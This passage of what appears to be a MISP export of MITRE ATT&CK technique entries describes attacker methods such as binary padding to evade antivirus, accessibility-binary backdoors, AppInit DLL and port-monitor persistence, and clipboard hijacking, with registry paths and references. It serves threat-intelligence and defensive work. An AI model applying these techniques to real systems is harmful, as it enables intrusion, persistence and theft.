https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Fallback Channels - T1008

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

The tag is: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"

Table 3821. Table References
Links
https://attack.mitre.org/techniques/T1008
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Binary Padding - T1009

Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009"

View relationships graph

Binary Padding - T1009 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 3822. Table References
Links
https://attack.mitre.org/techniques/T1009
https://capec.mitre.org/data/definitions/572.html
https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/
https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/
https://www.virustotal.com/en/faq/

Brute Force - T1110

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.

The tag is: misp-galaxy:mitre-attack-pattern="Brute Force - T1110"

Table 3823. Table References
Links
https://attack.mitre.org/techniques/T1110
https://capec.mitre.org/data/definitions/49.html

Query Registry - T1012

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="Query Registry - T1012"

Table 3824. Table References
Links
https://attack.mitre.org/techniques/T1012
https://capec.mitre.org/data/definitions/647.html
https://en.wikipedia.org/wiki/Windows_Registry

Remote Services - T1021

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)

Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Services - T1021"

Table 3825. Table References
Links
https://attack.mitre.org/techniques/T1021
https://capec.mitre.org/data/definitions/555.html
https://www.ssh.com/ssh
https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
https://support.apple.com/en-us/HT209161
https://support.apple.com/en-us/HT201710
https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf
https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html
http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html
https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

Web Service - T1102

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Web Service - T1102"

Table 3826. Table References
Links
https://attack.mitre.org/techniques/T1102
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

AppInit DLLs - T1103

Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103"

View relationships graph

AppInit DLLs - T1103 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

Table 3827. Table References
Links
https://attack.mitre.org/techniques/T1103
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://support.microsoft.com/en-us/kb/197571
https://msdn.microsoft.com/en-us/library/dn280412
https://technet.microsoft.com/en-us/sysinternals/bb963902

Port Monitors - T1013

A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

Local Port
Standard TCP/IP Port
USB Monitor
WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013"

View relationships graph

Port Monitors - T1013 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 3828. Table References
Links
https://attack.mitre.org/techniques/T1013
http://msdn.microsoft.com/en-us/library/dd183341
https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
https://technet.microsoft.com/en-us/sysinternals/bb963902

Accessibility Features - T1015

Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)

On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
Narrator: <code>C:\Windows\System32\Narrator.exe</code>
Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015"

View relationships graph

Accessibility Features - T1015 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 3829. Table References
Links
https://attack.mitre.org/techniques/T1015
https://capec.mitre.org/data/definitions/558.html
https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

Clipboard Modification - T1510

Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the <code>ClipboardManager.OnPrimaryClipChangedListener</code> interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)

Adversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

[Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within the Android/Clipper.C trojan. This sample had been detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510"

Table 3830. Table References
Links
https://attack.mitre.org/techniques/T1510
https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/
https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/
http://www.cis.syr.edu/_{wedu/Research/paper/clipboard_attack_dimva2014.pdf[http://www.cis.syr.edu/}wedu/Research/paper/clipboard_attack_dimva2014.pdf]
https://vms.drweb.com/virus/?i=17517761
https://vms.drweb.com/virus/?i=17517750
https://developer.android.com/about/versions/10/privacy/changes#clipboard-data

Plist Modification - T1150

Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user’s privileges). Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150"

View relationships graph

Plist Modification - T1150 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

Table 3831. Table References
Links
https://attack.mitre.org/techniques/T1150
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Systemd Service - T1501

Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.

ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.
ExecReload directive covers when a service restarts.
ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.

Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501"

View relationships graph

Systemd Service - T1501 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

Table 3832. Table References
Links
https://attack.mitre.org/techniques/T1501
http://man7.org/linux/man-pages/man1/systemd.1.html
https://www.freedesktop.org/wiki/Software/systemd/
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Shared Webroot - T1051

This technique has been deprecated and should no longer be used.

Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website’s webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.

This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)

The tag is: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051"

Table 3833. Table References
Links
https://attack.mitre.org/techniques/T1051
https://capec.mitre.org/data/definitions/563.html
http://httpd.apache.org/docs/2.4/getting-started.html#content
https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/

Native API - T1106

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Native API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).

The tag is: misp-galaxy:mitre-attack-pattern="Native API - T1106"

Table 3834. Table References
Links
https://attack.mitre.org/techniques/T1106
https://undocumented.ntinternals.net/
https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/
https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
http://msdn.microsoft.com/en-us/library/ms682425
https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
https://docs.microsoft.com/en-us/windows/win32/api/
https://man7.org/linux/man-pages//man7/libc.7.html
https://www.gnu.org/software/libc/
https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
https://developer.apple.com/documentation/coreservices
https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1
https://developer.apple.com/documentation/foundation

Deploy Container - T1610

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker’s <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)

The tag is: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610"

Table 3835. Table References
Links
https://attack.mitre.org/techniques/T1610
https://docs.docker.com/engine/api/v1.41/#tag/Container
https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/
https://blog.aquasec.com/malicious-container-image-docker-container-host

Launch Daemon - T1160

Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.

The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160"

View relationships graph

Launch Daemon - T1160 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"

Table 3836. Table References
Links
https://attack.mitre.org/techniques/T1160
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

File Deletion - T1107

Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1107"

View relationships graph

File Deletion - T1107 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 3837. Table References
Links
https://attack.mitre.org/techniques/T1107
http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

Redundant Access - T1108

This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated.

If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary’s tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.

Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.

The tag is: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108"

Table 3838. Table References
Links
https://attack.mitre.org/techniques/T1108
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Component Firmware - T1109

Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109"

View relationships graph

Component Firmware - T1109 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002" with estimative-language:likelihood-probability="almost-certain"

Table 3839. Table References
Links
https://attack.mitre.org/techniques/T1109
https://www.smartmontools.org/
https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

System Firmware - T1019

The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

The tag is: misp-galaxy:mitre-attack-pattern="System Firmware - T1019"

View relationships graph

System Firmware - T1019 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 3840. Table References
Links
https://attack.mitre.org/techniques/T1019
https://capec.mitre.org/data/definitions/532.html
https://en.wikipedia.org/wiki/BIOS
https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface
http://www.uefi.org/about
http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research
http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about
https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/
https://github.com/chipsec/chipsec
http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

Data Encrypted - T1022

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.

Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022"

View relationships graph

Data Encrypted - T1022 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

Table 3841. Table References
Links
https://attack.mitre.org/techniques/T1022
http://www.netsec.colostate.edu/_{zhang/DetectingEncryptedBotnetTraffic.pdf[http://www.netsec.colostate.edu/}zhang/DetectingEncryptedBotnetTraffic.pdf]
https://en.wikipedia.org/wiki/List_of_file_signatures

Data Hiding - T1320

Certain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)

The tag is: misp-galaxy:mitre-attack-pattern="Data Hiding - T1320"

Table 3842. Table References
Links
https://attack.mitre.org/techniques/T1320

Shortcut Modification - T1023

Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023"

View relationships graph

Shortcut Modification - T1023 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 3843. Table References
Links
https://attack.mitre.org/techniques/T1023
https://capec.mitre.org/data/definitions/132.html

Broadcast Receivers - T1402

An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.

Further, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.

In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

The tag is: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"

Table 3844. Table References
Links
https://attack.mitre.org/techniques/T1402
https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts

User Execution - T1204

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

The tag is: misp-galaxy:mitre-attack-pattern="User Execution - T1204"

Table 3845. Table References
Links
https://attack.mitre.org/techniques/T1204

Task requirements - T1240

Once divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Task requirements - T1240"

Table 3846. Table References
Links
https://attack.mitre.org/techniques/T1240

Traffic Signaling - T1205

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

